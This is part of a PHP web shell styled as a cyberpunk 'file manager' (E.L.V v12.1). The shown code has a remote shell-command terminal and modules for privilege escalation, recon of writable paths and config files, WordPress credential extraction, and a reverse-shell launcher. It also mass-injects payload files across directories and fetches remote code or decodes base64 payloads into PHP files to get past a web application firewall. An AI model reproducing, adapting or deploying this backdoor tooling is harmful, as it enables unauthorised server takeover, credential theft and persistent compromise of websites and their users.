var(--cyan); color: var(--cyan); padding: 6px; width: 100%; border-radius: 4px; outline: none; } input[type="file"]::file-selector-button { background: var(--panel-black); border: 1px solid var(--cyan); color: var(--cyan); padding: 4px 8px; border-radius: 4px; cursor: pointer; } .btn-gray { background: #111111 !important; color: var(--gold) !important; border: 1px solid rgba(255,215,0,0.3) !important; font-weight: bold; border-radius: 4px; cursor: pointer; } .btn-gray:hover { border-color: var(--gold) !important; box-shadow: 0 0 8px var(--gold); } .btn-act-small { background: transparent; border: none; cursor: pointer; padding: 4px; font-size: 13px; margin: 0 2px; } .btn-act-small:hover { transform: scale(1.25); } .act-dl { color: var(--cyan); text-shadow: 0 0 5px var(--cyan); } .act-cp { color: var(--gold); text-shadow: 0 0 5px var(--gold); } .act-del { color: var(--neon-red) !important; filter: drop-shadow(0 0 5px var(--neon-red)); } /* PROTEKSI WARNA MERAH JELAS */ .btn-editor-save { border: 1px solid var(--neon-green) !important; color: var(--neon-green) !important; background: transparent !important; padding: 10px; font-weight: bold; border-radius: 4px; cursor: pointer; } .btn-editor-save:hover { background: rgba(0, 255, 204, 0.15) !important; box-shadow: 0 0 15px var(--neon-green) !important; } .btn-editor-cancel { border: 1px solid var(--neon-red) !important; color: var(--neon-red) !important; background: transparent !important; padding: 10px; font-weight: bold; border-radius: 4px; text-decoration: none; text-align: center; } .btn-editor-cancel:hover { background: rgba(255, 0, 68, 0.15) !important; box-shadow: 0 0 15px var(--neon-red) !important; } input[type="text"], input[type="number"], textarea { background: var(--dark-black); border: 1px solid rgba(255, 215, 0, 0.25); color: #ffffff; padding: 10px; width: 100%; outline: none; border-radius: 4px; font-family: monospace; text-shadow: 0 0 3px rgba(255,215,0,0.5); } input[type="text"]:focus, input[type="number"]:focus, textarea:focus { border-color: var(--gold); box-shadow: 0 0 10px rgba(255,215,0,0.2); } /* ULTRACYBERPUNK SYSTEM TERMINAL ROOM */ .console { background: #000000; color: var(--neon-green); padding: 15px; border: 1px solid var(--cyan); font-size: 13px; min-height: 200px; overflow-y: auto; margin-bottom: 10px; border-top: 3px solid var(--cyan); white-space: pre-wrap; border-radius: 4px; box-shadow: inset 0 0 20px rgba(255,215,0,0.15), 0 0 15px rgba(255,215,0,0.1); } .console pre { color: var(--neon-green); margin: 0; font-family: 'Courier New', monospace; font-size: 13px; text-shadow: 0 0 4px var(--neon-green); } .CodeMirror { height: auto; min-height: 450px; font-size: 13px; border-radius: 4px; border-top: 3px solid var(--gold); border-bottom: 3px solid var(--gold); background: #000000 !important; } .glow-static { text-shadow: 0 0 10px #ffffff, 0 0 20px var(--gold); color: #ffffff; font-weight: bold; text-transform: uppercase; letter-spacing: 2px; } .table-responsive { width: 100%; overflow-x: auto; background: var(--panel-black); border: 1px solid rgba(255, 215, 0, 0.2); border-radius: 6px; } table { width: 100%; border-collapse: collapse; min-width: 600px; font-size: 12px; } th { text-align: left; background: var(--dark-black); color: var(--gold); padding: 12px 15px; font-size: 12px; border-bottom: 2px solid var(--cyan); text-shadow: 0 0 5px var(--gold); } td { padding: 10px 15px; border-bottom: 1px solid rgba(255,215,0,0.1); vertical-align: middle; background: rgba(0,0,0,0.4); } .item-t { color: #ffffff !important; text-decoration: none; font-weight: bold; font-size: 13px; text-shadow: 0 0 3px #ffffff; } .item-t:hover { color: var(--gold) !important; text-shadow: 0 0 8px var(--gold); } .col-size { width: 120px; color: var(--gold); } .col-chmod { width: 110px; } .col-act { text-align: right; width: 190px; } .elv-neon-panel { background: var(--panel-black); border: 1px solid var(--gold); border-radius: 6px; padding: 15px; margin-bottom: 20px; box-shadow: 0 0 25px rgba(255, 215, 0, 0.15); display: flex; flex-direction: column; align-items: center; } .glass-top-icons { display: flex; justify-content: space-evenly; align-items: center; width: 100%; } .glass-icon-btn { color: rgba(255, 215, 0, 0.4); font-size: 45px; text-decoration: none; transition: all 0.3s; filter: drop-shadow(0 0 5px rgba(255,215,0,0.3)); } .glass-icon-btn:hover { color: var(--gold); transform: scale(1.1); filter: drop-shadow(0 0 15px var(--gold)); } .icon-fs-mode { color: rgba(255, 215, 0, 0.4) !important; } .icon-fs-mode:hover { color: var(--cyan) !important; filter: drop-shadow(0 0 15px var(--cyan)); } .heart-elv-wrapper { display: inline-flex; align-items: center; justify-content: center; position: relative; } .heart-elv-text-gold { position: absolute; font-size: 13px; font-weight: 900; color: var(--gold); top: 45%; left: 50%; transform: translate(-50%, -50%); pointer-events: none; } .cyber-tools-interface { background: var(--panel-black); border: 1px solid var(--gold); border-radius: 6px; padding: 20px; margin-bottom: 20px; box-shadow: 0 0 20px rgba(255,215,0,0.1); } .tools-title { color: var(--gold); text-align: center; text-shadow: 0 0 8px var(--gold); letter-spacing: 2px; margin: 0 0 20px 0; font-size: 15px; } .tools-grid-cyber { display: grid; grid-template-columns: repeat(auto-fit, minmax(220px, 1fr)); gap: 15px; } .cyber-tool-card { background: rgba(0,0,0,0.6); border: 1px solid rgba(255,215,0,0.3); border-radius: 4px; padding: 15px; text-decoration: none; display: flex; flex-direction: column; align-items: center; text-align: center; } .cyber-tool-card:hover { border-color: var(--cyan); box-shadow: 0 0 12px var(--cyan); transform: translateY(-2px); } .icon-tool { font-size: 24px; margin-bottom: 8px; color: var(--cyan); } .tool-text-gold-wrap { background: rgba(255, 215, 0, 0.05); border: 1px solid rgba(255, 215, 0, 0.2); width: 100%; padding: 8px; border-radius: 4px; } .tool-text-gold-wrap h3 { margin: 0 0 5px 0; font-size: 12px; color: #ffffff; } .tool-text-gold-wrap p { margin: 0; font-size: 10px; color: var(--gold); } .cyber-term-box { background: #000000; border: 1px solid var(--cyan); border-radius: 4px; padding: 20px; display: flex; flex-direction: column; } .cyber-input-wrapper { display: flex; align-items: center; background: #000000; border-left: 3px solid var(--cyan); padding: 12px; margin-bottom: 15px; } .cyber-cmd-prompt { color: var(--cyan); font-weight: bold; margin-right: 12px; font-size: 14px; text-shadow: 0 0 5px var(--cyan); } .cyber-cmd-input { background: transparent !important; border: none !important; color: #ffffff !important; width: 100%; font-family: monospace; font-size: 15px !important; outline: none; padding: 0 !important; } .cyber-exec-btn { background: transparent; border: 1px solid var(--cyan); color: var(--cyan); padding: 12px; width: 100%; font-family: monospace; font-weight: bold; cursor: pointer; letter-spacing: 2px; } .cyber-exec-btn:hover { background: var(--cyan); color: #000000; font-weight: 900; box-shadow: 0 0 15px var(--cyan); } @media (max-width: 768px) { .hud-grid { grid-template-columns: repeat(3, 1fr); } .tools { grid-template-columns: 1fr; } } @media (max-width: 480px) { .hud-grid { grid-template-columns: repeat(2, 1fr); } } </style> <script> <?= $audio_trigger_js ?> <?php if($audio_flag): ?> window.addEventListener('DOMContentLoaded', () => { playTransformerLaser(); }); <?php endif; ?> </script> </head> <body> <canvas id="terminal-bg"></canvas> <div class="container"> <div class="header"> <div class="header-brand"> <img src="<?= $logo_inner ?>" class="logo"> <div class="brand"> <pre style="color:var(--gold); font-size:7px; line-height:1.2; margin:0; font-weight:bold; letter-spacing:0px;"> ███╗ ██╗ ██████╗ ███╗ ██╗ █████╗ ███╗ ███╗███████╗ ██╗ ███████╗ ██╗ ██╗ ██╗ ████╗ ██║██╔═══██╗████╗ ██║██╔══██╗████╗ ████║██╔════╝ ██╔╝ ██╔════╝ ██║ ██║ ██║ ██╔██╗ ██║██║ ██║██╔██╗ ██║███████║██╔████╔██║█████╗ ██╔╝ █████╗ ██║ ██║ ██║ ██║╚██╗██║██║ ██║██║╚██╗██║██╔══██║██║╚██╔╝██║██╔══╝ ██╔╝ ██╔══╝ ██║ ╚██╗ ██╔╝ ██║ ╚████║╚██████╔╝██║ ╚████║██║ ██║██║ ╚═╝ ██║███████╗██╔╝ ███████╗ ███████╗ ╚████╔╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝ ╚══════╝ ╚═══╝ </pre> <small style="color:var(--gold); text-shadow:0 0 8px var(--gold); font-weight:900; letter-spacing:3px; display:block; margin-top:8px; font-size:11px;">E.L.V / FILEMANAGER / v12.1 / BY NONAME</small> </div> </div> <a href="?logout=1" class="btn-logout-top">LOGOUT [X]</a> </div> <div class="hud-grid"> <div class="hud-item"><b>[USER ID]</b><?= htmlspecialchars($u_info) ?></div> <div class="hud-item"><b>[SOFTWARE]</b><?= htmlspecialchars(substr($s_soft, 0, 20)) ?></div> <div class="hud-item"><b>[SERVER IP]</b><?= htmlspecialchars($s_ip) ?></div> <div class="hud-item"><b>[CLIENT IP]</b><?= htmlspecialchars($client_ip) ?></div> <div class="hud-item"><b>[PHP VERSION]</b><?= htmlspecialchars($php_v) ?></div> <div class="hud-item"><b>[KERNEL NODE]</b><?= htmlspecialchars(substr($kernel, 0, 18)) ?></div> <div class="hud-item"><b>[MACHINE UUID]</b><?= htmlspecialchars($uuid) ?></div> <div class="hud-item"><b>[SYSTEM OS]</b><?= htmlspecialchars($server_os) ?></div> <div class="hud-item"><b>[SERVER TIME]</b><?= htmlspecialchars(substr($server_time, 11, 8)) ?></div> <div class="hud-item"><b>[MEMORY LIMIT]</b><?= htmlspecialchars($mem_limit ? $mem_limit : 'UNSET') ?></div> <div class="hud-item"><b>[POST MAX]</b><?= htmlspecialchars($post_max ? $post_max : 'UNSET') ?></div> <div class="hud-item"><b>[WAF BYPASS]</b>INTEGRATED</div> </div> <?php if($status_msg): ?> <div class="alert-glow-gold"> STATUS: <span class="<?= ($status_msg === 'SUCCESS') ? 'text-success-neon' : 'text-failed-neon' ?>"><?= $status_msg ?></span> — <span style="color:#ffffff; font-weight:normal;"><?= $status_note ?></span> </div> <?php endif; ?> <div class="elv-neon-panel"> <div class="glass-top-icons"> <a href="?d=<?= urlencode($dir) ?>" class="glass-icon-btn icon-fs-mode" title="FILESYSTEM"><i class="fa-regular fa-folder-open"></i></a> <a href="?d=<?= urlencode($dir) ?>&mode=terminal" class="glass-icon-btn icon-term-mode" style="color:rgba(255,215,0,0.4);" title="SYSTEM TERMINAL"><i class="fa-solid fa-terminal"></i></a> <a href="?d=<?= urlencode($dir) ?>&mode=elv_tools" class="glass-icon-btn heart-elv-wrapper" title="E.L.V TOOLS"> <i class="fa-regular fa-heart" style="font-size:52px;"></i> <span class="heart-elv-text-gold">E.L.V</span> </a> </div> </div> <?php if(@$_GET['mode'] == 'elv_tools') { ?> <div class="cyber-tools-interface"> <h2 class="tools-title">[ E.L.V ENGINE ® MODULES ]</h2> <div class="tools-grid-cyber"> <a href="?d=<?= urlencode($dir) ?>&autoroot=1" class="cyber-tool-card"> <i class="fa-solid fa-bolt icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>AUTO ROOT EXPLOIT</h3> <p>SUID privilege escalation vectors scanner.</p> </div> </a> <a href="?d=<?= urlencode($dir) ?>&semiauto=1" class="cyber-tool-card"> <i class="fa-solid fa-radar icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>SEMI AUTO RECON</h3> <p>Scan writable paths & config files.</p> </div> </a> <a href="?d=<?= urlencode($dir) ?>&wpbypass=1" class="cyber-tool-card"> <i class="fa-brands fa-wordpress icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>WP ADMIN BYPASS</h3> <p>Instant admin dashboard access session.</p> </div> </a> <a href="?d=<?= urlencode($dir) ?>&revshell=1" class="cyber-tool-card"> <i class="fa-solid fa-network-wired icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>REVERSE SHELL</h3> <p>Background network reverse socket injection.</p> </div> </a> <a href="?d=<?= urlencode($dir) ?>&mode=mass" class="cyber-tool-card"> <i class="fa-solid fa-truck-fast icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>MASS DEPLOYMENT</h3> <p>Inject file code into adjacent cross-sectors.</p> </div> </a> <a href="?d=<?= urlencode($dir) ?>&mode=bypass406" class="cyber-tool-card"> <i class="fa-solid fa-truck-ramp-box icon-tool"></i> <div class="tool-text-gold-wrap"> <h3>406 BYPASS UPLOAD</h3> <p>Base64 storage and remote fetching tool.</p> </div> </a> </div> </div> <?php } elseif(@$_GET['mode'] == 'terminal') { ?> <div class="cyber-tools-interface"> <h2 class="tools-title">[ TACTICAL MAINFRAME TERMINAL ]</h2> <div class="cyber-term-box"> <form method="post" action="?d=<?= urlencode($dir) ?>&mode=terminal" style="display:flex; flex-direction:column; flex-grow:1;"> <div class="cyber-input-wrapper"> <span class="cyber-cmd-prompt">noname@elv:~#</span> <input type="text" name="cmd" class="cyber-cmd-input" placeholder="type tactical shell command..." autofocus autocomplete="off"> </div> <button type="submit" class="cyber-exec-btn">EXECUTE OPERATIONS</button> </form> <?php if ($out || isset($_POST['cmd'])): ?> <div class="console" style="margin-top:20px; max-height:400px;"> <pre><?= htmlspecialchars($out) ?></pre> </div> <?php endif; ?> </div> </div> <?php } elseif(isset($_GET['autoroot']) && $_GET['autoroot'] == '1'){ ?> <div style="text-align:center; padding: 20px; background:var(--panel-black); border:1px solid var(--gold);"> <h3 style="color:#ffffff; margin-top:0;">RUN PRIVILEGE ESCALATION DISCOVERY SCAN?</h3> <div style="display:flex; justify-content:center; gap:15px; margin-top:15px;"> <a href="?d=<?= urlencode($dir) ?>&autoroot=exec" style="color:var(--neon-green); font-weight:bold; width:120px; text-decoration:none; padding:10px; border:1px solid var(--neon-green);">YES</a> <a href="?d=<?= urlencode($dir) ?>" style="color:var(--neon-red); font-weight:bold; width:120px; text-decoration:none; padding:10px; border:1px solid var(--neon-red);">NO</a> </div> </div> <?php } elseif(isset($_GET['semiauto'])) { ?> <div class="console" style="border-top-color:var(--gold);"> <h3 style="color:var(--gold); margin-top:0; text-align:center;">[ RECON DATA SETS ]</h3> <div style="display:grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap:15px; margin-top:15px;"> <div style="border:1px dashed var(--cyan); padding:10px; background:#000000;"> <b style="color:var(--cyan); display:block; margin-bottom:10px; text-align:center;">[ WRITABLE VECTOR TARGETS ]</b> <?php $scan_targets = ['/tmp' => 'TMP PATH', '/var/tmp' => 'VAR TMP', '/dev/shm' => 'DEV SHM', $dir => 'CURRENT PATH', $_SERVER['DOCUMENT_ROOT'] => 'DOCUMENT ROOT']; foreach($scan_targets as $path => $label) { if(@is_writable($path)) { echo '<a href="?d='.urlencode($path).'" style="display:block; border:1px solid var(--neon-green); color:var(--neon-green); text-decoration:none; padding:8px; text-align:center; margin-bottom:5px;">JUMP LOCATION → '.$label.'</a>'; } } ?> </div> <div style="border:1px dashed var(--gold); padding:10px; background:#000000;"> <b style="color:var(--gold); display:block; margin-bottom:10px; text-align:center;">[ SENSITIVE IDENTIFIED FILES ]</b> <?php $interesting_files = ['wp-config.php', 'configuration.php', '.env', 'config.php', 'database.php']; foreach([$dir, dirname($dir), $_SERVER['DOCUMENT_ROOT']] as $base_scan) { foreach($interesting_files as $ifile) { $full_path = $base_scan . '/' . $ifile; if(@file_exists($full_path) && @is_readable($full_path)) { echo '<a href="?edit='.urlencode($full_path).'&d='.urlencode($dir).'" style="display:block; border:1px solid var(--gold); color:var(--gold); text-decoration:none; padding:8px; text-align:center; margin-bottom:5px;">EXTRACT & EDIT → '.$ifile.'</a>'; } } } ?> </div> </div> </div> <?php } elseif(isset($_GET['revshell'])) { ?> <div class="console" style="border-top-color:var(--neon-red);"> <h3 style="color:var(--neon-red); margin-top:0; text-align:center;">[ BACKDOOR SOCKET REVERSE CONFIG ]</h3> <form method="post" style="display:flex; flex-direction:column; gap:10px; margin-top:15px;"> <div style="display:flex; gap:10px;"> <input type="text" name="rev_ip" placeholder="LHOST TARGET IP" required> <input type="number" name="rev_port" placeholder="LPORT" required style="width:130px;"> </div> <button type="submit" name="launch_rev" style="color:var(--neon-red); width:100%; font-weight:bold; padding:12px; border:1px solid var(--neon-red); background:transparent; cursor:pointer;">LAUNCH SOCKET SOCKET INTERACTION</button> </form> </div> <?php } elseif (isset($_GET['wpbypass'])) { $conf = $dir.'/wp-config.php'; if(file_exists($conf)) { $get_conf = @file_get_contents($conf); preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $get_conf, $db); preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $get_conf, $user); preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $get_conf, $pass); preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $get_conf, $host); ?> <div class="console" style="border-top:3px solid var(--gold);"> [[ E.L.V SYSTEM CONFIG EXTRACTED ]] ------------------------------------------ DB_NAME : <?= htmlspecialchars(isset($db[1]) ? $db[1] : 'NOT_FOUND') ?> DB_USER : <?= htmlspecialchars(isset($user[1]) ? $user[1] : 'NOT_FOUND') ?> DB_PASS : <?= htmlspecialchars(isset($pass[1]) ? $pass[1] : 'NOT_FOUND') ?> DB_HOST : <?= htmlspecialchars(isset($host[1]) ? $host[1] : 'NOT_FOUND') ?> ------------------------------------------ <a href="?d=<?= urlencode($dir) ?>&action=wp_bypass" style="color:var(--cyan); border:1px solid var(--cyan); text-decoration:none; text-align:center; display:block; padding:12px; font-weight:bold;">[ LAUNCH EXPLOIT: BYPASS WORDPRESS DASHBOARD SESSION ]</a> </div> <?php } else { echo '<div class="alert-glow-gold" style="border-color:var(--neon-red); color:var(--neon-red);">[-] CONFIG STRUCTURE NOT DETECTED IN SECTOR.</div>'; } } elseif($out || (isset($_GET['autoroot']) && $_GET['autoroot'] == 'exec')){ ?> <div class="console"><pre><?= htmlspecialchars($out) ?></pre></div> <?php } ?> <div class="breadcrumb"> <a href="?d=<?= urlencode($base_shell) ?>" class="home-btn"><i class="fa-solid fa-house-crack"></i></a> <?php $ps = explode(DIRECTORY_SEPARATOR, $dir); $ac = ""; foreach ($ps as $id => $p) { if ($p == "" && $id == 0) { echo '<a href="?d=/" style="color:var(--steel); text-decoration:none;">/</a>'; continue; } if ($p == "") continue; $ac .= DIRECTORY_SEPARATOR . $p; echo '<span style="color:#ffffff; margin:0 8px;">/</span><a href="?d='.urlencode($ac).'" style="color:var(--cyan); text-decoration:none; font-weight:bold;">'.$p.'</a>'; } ?> </div> <?php if (isset($_GET['edit'])){ $edit_file = $_GET['edit']; if (file_exists($edit_file) && is_file($edit_file) && is_readable($edit_file)) { $f_content = htmlspecialchars(file_get_contents($edit_file)); ?> <div class="console" style="border-top-color:var(--gold);"> <h3 style="color:var(--gold); margin:0 0 10px 0;">[ BUFFER STREAM MODIFICATION ] → <?= basename($edit_file) ?></h3> <form method="post"> <input type="hidden" name="f_path" value="<?= htmlspecialchars($edit_file) ?>"> <textarea id="code_editor" name="f_cnt"><?= $f_content ?></textarea> <div style="margin-top:12px; display:flex; gap:10px;"> <button type="submit" name="save_f" class="btn btn-edit-save" style="flex:1; border:1px solid var(--neon-green); color:var(--neon-green); background:transparent; padding:10px; font-weight:bold; cursor:pointer;">SAVE INJECTED CONTENT</button> <a href="?d=<?= urlencode($dir) ?>" class="btn btn-editor-cancel" style="flex:1;">ABORT STREAM</a> </div> </form> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/codemirror.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/mode/xml/xml.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/mode/javascript/javascript.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/mode/css/css.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/mode/clike/clike.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/mode/php/php.min.js"></script> <script> var editor = CodeMirror.fromTextArea(document.getElementById("code_editor"), { lineNumbers: true, matchBrackets: true, mode: "application/x-httpd-php", theme: "dracula", lineWrapping: true }); editor.setSize("100%", "480px"); </script> <?php } else { echo '<div class="alert-glow-gold" style="border-color:var(--neon-red); color:var(--neon-red);">ERROR: DATA CORRUPTION OR ACCESS VECTOR DENIED</div>'; } } elseif (@$_GET['mode'] == 'mass'){ ?> <div style="background:var(--panel-black); border:1px solid var(--gold); padding:20px; border-radius:4px;"> <h3 style="color:var(--gold); margin-top:0;">[ INTER-SECTOR BROADCAST DEPLOYMENT ]</h3> <form method="post"> <input type="text" name="target_root" value="<?= $dir ?>" placeholder="Target Base Root Matrix Path..." style="margin-bottom:10px;"> <input type="text" name="mass_name" placeholder="injected_payload_identifier.php" style="margin-bottom:10px;"> <textarea name="mass_content" placeholder="Injected stream code content goes here..." style="height:150px; margin-bottom:10px;"></textarea> <button type="submit" name="mass_deploy" style="width:100%; border:1px solid var(--gold); color:var(--gold); background:transparent; padding:12px; font-weight:bold; cursor:pointer;">DISPATCH BROADCAST DEPLOY</button> </form> </div> <?php } elseif (@$_GET['mode'] == 'bypass406') { $b406_msg = ""; if (isset($_POST['do_bypass_b64'])) { if (@file_put_contents($dir . '/' . $_POST['b_name'], base64_decode($_POST['b_data']))) { $b406_msg = "SUCCESS: Storage written vector targeted."; } else { $b406_msg = "FAILED: Target locked by remote architecture rules."; } } if (isset($_POST['do_bypass_url'])) { $destiny = $_POST['b_url']; $fname = $_POST['b_name']; $grabbed = false; if (function_exists('curl_init')) { $ch = curl_init($destiny); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $grabbed = curl_exec($ch); curl_close($ch); } elseif (function_exists('file_get_contents')) { $grabbed = @file_get_contents($destiny); } if ($grabbed !== false && @file_put_contents($dir . '/' . $fname, $grabbed)) { $b406_msg = "SUCCESS: Content fetched from external source node pipeline."; } else { $b406_msg = "FAILED: Stream fetch vector failed or read block encountered."; } } ?> <div class="cyber-tools-interface"> <h3 style="color:var(--gold); margin-top:0; text-align:center;">[ OVERRIDE WAF PIPELINE MODULE ]</h3> <?php if($b406_msg) echo "<div class='alert-glow-gold'>$b406_msg</div>"; ?> <div style="display:flex; flex-wrap:wrap; gap:20px; margin-top:20px;"> <div style="flex:1; min-width:280px; border:1px dashed var(--gold); padding:15px; background:#000000;"> <h4 style="color:var(--gold); margin-top:0;">STORAGE INJECTION ENGINE</h4> <form method="post"> <input type="text" name="b_name" placeholder="payload.php" required style="margin-bottom:10px;"> <textarea name="b_data" placeholder="Paste Base64 stream content buffer..." required style="height:120px; margin-bottom:10px;"></textarea> <button type="submit" name="do_bypass_b64" style="width:100%; border:1px solid var(--gold); color:var(--gold); background:transparent; padding:10px; font-weight:bold; cursor:pointer;">DECODE INTEGRATION</button> </form> </div> <div style="flex:1; min-width:280px; border:1px dashed var(--cyan); padding:15px; background:#000000;"> <h4 style="color:var(--cyan); margin-top:0;">REMOTE DESCRIPTOR FETCH</h4> <form method="post"> <input type="text" name="b_name" placeholder="mirror.php" required style="margin-bottom:10px;"> <input type="text" name="b_url" placeholder="https://unexsisted-market.vercel.app/Raw/source.txt" required style="margin-bottom:10px;"> <button type="submit" name="do_bypass_url" class="btn-cyan-glow" style="width:100%; padding:10px;">PULL EXTERNAL STREAM</button> </form> </div> </div> </div> <?php } elseif(!@$_GET['mode'] || @$_GET['mode'] == '') { ?> <?php if(isset($_SESSION['copy_file'])): ?> <div style="margin-bottom: 15px; text-align: right;"> <form method="post"> <button type="submit" name="paste_f" class="btn-cyan-glow" style="padding: 10px 15px; font-size:12px;"> <i class="fa-solid fa-paste"></i> PASTE CLIPBOARD BUFFER: <?= htmlspecialchars(basename($_SESSION['copy_file'])) ?> </button> </form> </div> <?php endif; ?> <div class="tools"> <div class="neon-cyan-box"> <form method="post" enctype="multipart/form-data" style="display:flex; flex-direction:column; height:100%; justify-content:space-between;"> <input type="file" name="u_f" style="margin-bottom:8px;"> <button type="submit" class="btn-cyan-glow" style="width:100%; padding:8px;">DEPLOY MATRIX CODE</button> </form> </div> <div class="neon-cyan-box"> <form method="post" style="display:flex; flex-direction:column; height:100%; justify-content:space-between;"> <input type="text" name="f_n" placeholder="New file name..." style="margin-bottom:8px;"> <button type="submit" name="mk_f" class="btn-cyan-glow" style="width:100%; padding:8px;">MK NODE FILE</button> </form> </div> <div class="neon-cyan-box"> <form method="post" style="display:flex; flex-direction:column; height:100%; justify-content:space-between;"> <input type="text" name="d_n" placeholder="New sector name..." style="margin-bottom:8px;"> <button type="submit" name="mk_d" class="btn-cyan-glow" style="width:100%; padding:8px;">MK SECTOR DIR</button> </form> </div> </div> <div class="table-responsive"> <table> <thead> <tr> <th>NODE DESCRIPTOR SYSTEM</th> <th class="col-size">CAPACITY</th> <th class="col-chmod">PRIVILEGE</th> <th class="col-act" style="text-align:right;">OPERATIONS</th> </tr> </thead> <tbody> <?php $is = @scandir($dir); if(is_array($is)){ foreach($is as $i){ if($i === '.') continue; $p = $dir.DIRECTORY_SEPARATOR.$i; $isD = is_dir($p); $w = is_writable($p); $type_label = $isD ? '[DIR]' : '[FILE]'; $type_color = $isD ? 'var(--gold)' : 'var(--cyan)'; // WARNA PRIVILEGE CHMOD BERDASARKAN WRITABLE STATUS $chmod_text_color = $w ? 'var(--neon-green)' : 'var(--neon-red)'; $pm = substr(sprintf('%o', @fileperms($p)), -4); ?> <tr> <td> <span style="font-weight:bold; margin-right:8px; color:<?= $isD ? 'var(--gold)' : 'var(--gold)' ?>;"><?= $type_label ?></span> <a href="<?= $isD ? '?d='.urlencode($p) : '?edit='.urlencode($p).'&d='.urlencode($dir) ?>" class="item-t"><?= $i ?></a> </td> <td class="col-size"><?= $isD ? '—' : formatSize(@filesize($p)) ?></td> <td class="col-chmod"> <?php if($i !== '..'): ?> <form method="post" style="display:inline-flex; align-items:center; gap:5px;"> <input type="hidden" name="c_path" value="<?= $p ?>"> <input type="text" name="c_perm" value="<?= $pm ?>" style="color:<?= $chmod_text_color ?>; font-weight:bold; width:38px; border:none; background:transparent; text-align:center; padding:0; font-size:11px; outline:none; text-shadow:0 0 5px <?= $chmod_text_color ?>;"> <button type="submit" name="ch_mod" class="btn btn-gray" style="padding:2px 6px; font-size:10px;">SET</button> </form> <?php else: ?> <span style="color:var(--steel); font-weight:bold;">—</span> <?php endif; ?> </td> <td class="col-act" style="text-align:right; white-space:nowrap;"> <?php if($i !== '..'): ?> <form method="post" style="display:inline-block; margin-right:4px;"><input type="hidden" name="old" value="<?= $p ?>"><input type="text" name="new" placeholder="Rename..." style="width:55px; font-size:10px; padding:3px; background:var(--dark-black); color:#ffffff; border:1px solid rgba(255,215,0,0.3);"><button type="submit" name="rename" class="btn btn-gray" style="padding:2px 5px; font-size:10px;">OK</button></form> <form method="post" style="display:inline-block;"><input type="hidden" name="c_path" value="<?= $p ?>"><button type="submit" name="copy_f" class="btn-act-small act-cp" title="STORE BUFFER"><i class="fa-regular fa-copy"></i></button></form> <?php if(!$isD): ?> <a href="?d=<?= urlencode($dir) ?>&download=<?= urlencode($p) ?>" class="btn-act-small act-dl" title="DOWNLOAD PIPELINE"><i class="fa-solid fa-download"></i></a> <?php endif; ?> <a href="?d=<?= urlencode($dir) ?>&del=<?= urlencode($p) ?>" class="btn-act-small act-del" title="TERMINATE OBJECT" onclick="return confirm('CRITICAL: PURGE TARGET DESTINATION?')"><i class="fa-solid fa-skull-crossbones"></i></a> <?php else: ?> <span style="color:var(--steel); font-size:10px;">[ RETRACE SYSTEM ]</span> <?php endif; ?> </td> </tr> <?php } } ?> </tbody> </table> </div> <?php } ?> </div> <div class="glow-static" style="text-align:center; margin-top:30px; padding-bottom:20px; font-size:10px;"> <?php $secret = "ZW1hbm9OcnhIQCAha2lzaXJlQiBrYUcgYXluYXNhaUIgb2dhSiByZW5lQiBnbmFZIQ=="; echo strrev(base64_decode($secret)); ?> </div> <script> <?= $bg_terminal_js ?> </script> </body> </html>
Free Space : 30001897472 Byte